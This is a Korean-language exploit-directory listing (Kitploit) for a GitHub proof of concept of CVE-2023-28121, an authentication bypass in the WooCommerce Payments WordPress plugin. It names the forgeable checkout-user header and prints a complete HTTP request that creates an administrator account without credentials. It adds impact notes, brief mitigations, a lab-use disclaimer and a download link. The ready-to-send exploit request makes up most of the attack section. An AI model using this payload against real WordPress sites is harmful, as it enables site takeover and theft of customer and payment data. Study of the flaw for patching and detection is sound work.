Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2023-28121-WordPress-Privilege-Escalation — WooCommerce Payments 플러그인을 사용한 WordPress의 중대한 취약점 실제 악용 | Kitploit
도구/GitHubGitHub/luisdevpentest/cve-2023-28121-wordpress-privilege-escalation
Authentication & AuthorizationPrivilege EscalationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & Education
GitHubluisdevpentest/cve-2023-28121-wordpress-privilege-escalation

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

CVE-2023-28121-WordPress-Privilege-Escalation

WooCommerce Payments 플러그인을 사용한 WordPress의 중대한 취약점 실제 악용

저장소 보기
13개월 전아직 검토되지 않음

🔐 CVE-2023-28121 — 워드프레스 권한 상승

WooCommerce Payments 플러그인을 사용한 WordPress의 심각한 취약점 실습적 탐구


📌 요약

CVE-2023-28121은 REST API를 통해 인증 없이 관리자 사용자를 생성할 수 있습니다.

  • 심각도: 심각 (CVSS 9.8)
  • 영향: 사이트 완전 제어
  • 유형: 인증 우회 / 권한 상승
  • +600,000 활성 설치 - 2023년 3월 https://www.wiz.io/vulnerability-database/cve/cve-2023-28121?utm_source=chatgpt.com

📊 영향을 받은 플러그인은 수십만 개의 설치를 보유하고 있으며, 전자상거래에서 널리 사용됩니다.


🎥 데모

https://github.com/user-attachments/assets/cead3884-0924-4320-967f-de9fb3f6cd44


⚠️ 작동 방식

시스템은 조작 가능한 헤더를 허용합니다:

root@kitploit:~
X-WCPAY-PLATFORM-CHECKOUT-USER: 1

이를 통해 유효한 인증 없이 높은 권한을 가진 사용자 생성을 위한 요청을 보낼 수 있습니다.


🧪 PoC

root@kitploit:~
POST /wp-json/wp/v2/users
Content-Type: application/json
X-WCPAY-PLATFORM-CHECKOUT-USER: 1

{
  "username": "hacked",
  "password": "StrongPass123!",
  "email": "[email protected]",
  "roles": ["administrator"]
}

✔️ 결과: 관리자 사용자 생성


🔥 영향

  • 관리자 생성
  • /wp-admin 패널 접근
  • 완전한 장악 가능
  • 사기 및 데이터 유출 위험

🛠️ 완화 방법

  • 패치된 버전으로 플러그인 업데이트
  • REST API 접근 제한
  • 인증 올바르게 검증

🧱 환경

  • WordPress (로컬 랩)
  • WooCommerce Payments (취약한 버전)

📚 참고 자료

  • CVE-2023-28121
  • WordPress REST API 문서
  • https://www.rcesecurity.com/2023/07/patch-diffing-cve-2023-28121-to-compromise-a-woocommerce/

👨‍💻 저자

Luis Eduardo .M.B.S.R

펜테스터 / 웹 보안

LinkedIn: https://www.linkedin.com/in/luis-eduardo-ti/

GitHub: https://github.com/luisdevpentest

⚖️ 면책 조항

통제된 환경에서의 교육적 용도. 본 지식이 타인에 의해 어떻게 사용되는지에 대해 책임을 지지 않습니다.


도구 다운로드